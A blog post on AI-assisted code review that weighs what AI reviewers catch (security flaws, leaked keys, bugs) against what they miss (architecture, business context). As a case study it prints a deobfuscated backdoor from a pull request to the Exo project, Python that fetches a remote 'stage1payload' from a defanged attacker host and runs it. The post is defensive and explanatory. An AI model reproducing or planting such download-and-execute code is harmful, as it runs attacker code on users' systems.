AI in Code Reviews: Reducing Human Errors and Enhancing Security

💡 TL;DR (AI-generated)

AI code reviewers excel at catching security vulnerabilities, malicious code, and API key leaks, providing an automated first line of defense before human review. However, they lack understanding of broader system architecture and business context, making them best suited as complementary tools rather than replacements for human expertise.

In the era of LLM-based tools like Cursor and Copilot, we're seeing a shift in how we write code. Development is moving faster, and we're publishing more code than ever before. But what about the way we review code?

Just as AI tools have enhanced our code writing capabilities, they can also transform how we approach code reviews. An AI-powered reviewer can serve as a tireless assistant, instantly analyzing code changes for potential issues before human reviewers even begin their review, basically as a fully automated pre-reviewer.

The Current State of Code Reviews

While AI assistants have revolutionized code writing, code review remains largely a manual process which often witnesses trade-offs between speed and quality. This trade-off is particularly prevalent when:

Teams are working under tight deadlines
Reviewing large, complex pull requests
Dealing with unfamiliar parts of the codebase
Limited bandwidth of experienced reviewers

These trade-offs are sometimes very costly for companies, as a not-so-thorough review often leads to bugs, security issues, and critical problems that can have a huge impact on the product. This is where LLM-based reviewers can provide a first line of defense by highlighting any potential vulnerabilities to the human reviewer, basically eliminating the overlooking issue.

Where AI Reviewers Shine

AI Code Reviewers are particularly good at identifying common issues on individual pieces of code, such as possible runtime errors, security vulnerabilities, api key leaks, and common anti-patterns.

1. Identifying Security Vulnerabilities

The post below blew up recently on X (Twitter). It shows an attempt to inject a backdoor into Exo, a popular open-source project.

The executed code was obfuscated into Unicode characters to somehow avoid detection, and it translated into the following:

import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)

Basically this patch was aiming to execute some remote code on each user of this library or other projects depending on it. It's unclear what the remote code was, since at the time of Pull Request the remote url was non existant, probably the attacker waiting for the code to be deployed first.

In this case, the human reviewer was vigilant enough to spot the anormal change within the pull request, but note that this was a rather poor attempt. There was very little code changed, and the malicious part was rather obvious. Now image this is part of a major change with 1000+ lines of code.

This is one of the flagship use-cases for AI Reviewers. To demonstrate this, I've recreated the PR and ran my rather simplistic AI reviewer on this code change to see how well it detects the threat.

As you can see the AI reviewer was able to spot the issue instantly and make it very clear to everyone checking the Pull Request that the code is posing a critical security risk.

2. Detecting Hardcoded Secrets and API Key Leaks

One of the most obvious yet devastating mistakes developers can make is committing sensitive data, like API keys, passwords, or tokens, to source control. AI reviewers excel at spotting these by scanning for patterns resembling secrets, such as: API keys for common services (e.g., AWS, Stripe, Google Cloud). Passwords embedded in configuration files. Private keys accidentally included in commits. AI tools like Presubmit Reviewer can flag these instantly, even suggesting remediation steps, such as replacing the hardcoded key with environment variables or secret management solutions.

3. Catching Critical Bugs Early

AI reviewers shine in detecting critical bugs that could otherwise slip through due to human oversight:

Null Pointer Exceptions: Flagging possible null pointer runtime errors like this one
Concurrency Issues: Identifying race conditions or improper thread synchronization.
Resource Leaks: Spotting file or network connections that are opened but not closed.

4. Accelerating Developer Feedback Loops

Manual code reviews are time-consuming, and reviewers may miss obvious issues, especially during high-pressure sprints. AI reviewers provide immediate feedback, allowing developers to:

Resolve issues before human reviewers even see the code.
Reduce back-and-forth iterations during pull requests.
Focus human reviews on higher-level design and logic instead of routine bug detection.

This not only saves time but also ensures that critical issues are addressed early in the development lifecycle.

Where AI Reviewers are Lacking

While AI reviewers excel at identifying specific code-level issues, they have significant limitations when it comes to understanding the broader context of a system. Let's look at where human reviewers still maintain a clear advantage:

System Architecture Context - AI reviewers can't understand how a change might impact other parts of the system that aren't directly referenced in the code
Historical Design Decisions - They lack awareness of why certain architectural choices were made, which might make their suggestions counterproductive
Business Requirements - They can't evaluate if a change actually solves the business problem it's meant to address
Performance Trade-offs - They might suggest "cleaner" code that doesn't account for specific performance requirements or scale considerations

For example, an AI reviewer might flag this code as inefficient:

// AI might suggest using a Set for O(1) lookup
const allowedUsers = ['user1', 'user2', 'user3'];

function checkAccess(userId: string) {
  return allowedUsers.includes(userId);
}

While technically correct about performance, the AI doesn't know that this is a deliberately simple implementation because the list will always be tiny and is checked infrequently. A human reviewer with context would understand that the slight performance gain isn't worth the added complexity.

Similarly, consider this database query:

// AI might flag this as inefficient
const results = await db.users.find({
  status: 'active',
  lastLogin: { $gt: thirtyDaysAgo }
}).toArray();

// Instead of suggesting:
const results = await db.users.find({
  status: 'active',
  lastLogin: { $gt: thirtyDaysAgo }
}).limit(10000).toArray();

An AI reviewer might suggest adding a limit to prevent memory issues, unaware that this query is part of a nightly batch job where we deliberately need all matching records. This highlights how AI reviewers can sometimes make suggestions that conflict with the actual requirements of the system.

This is why the most effective code review process combines both AI and human reviewers. The AI can handle the mechanical aspects - catching security issues, potential bugs, and style inconsistencies - while human reviewers can focus on the higher-level concerns that require context and understanding of the broader system architecture and business requirements.

Conclusion

AI-powered code reviews represent a powerful addition to modern development workflows. As demonstrated by the Exo backdoor attempt, these AI reviewers can instantly spot potentially malicious code and security vulnerabilities that might slip through during large changes, especially under time pressure.

However, they can't replace human expertise. While great at catching specific issues, AI reviewers lack the broader context needed to understand system architecture decisions and business requirements. The future of code review lies in combining AI's tireless attention to detail with human insight - using AI as a first line of defense while allowing human reviewers to focus on architecture, business logic, and system-wide implications.

Tweet about this

Follow @bdstanga

About the Author

Bogdan Stanga is a tech lead and software architect passionate about AI, code quality, and developer productivity. He is currently working on Google Search and spends the weekends building Presubmit.ai, a collection of AI-powered open-source tools for developers.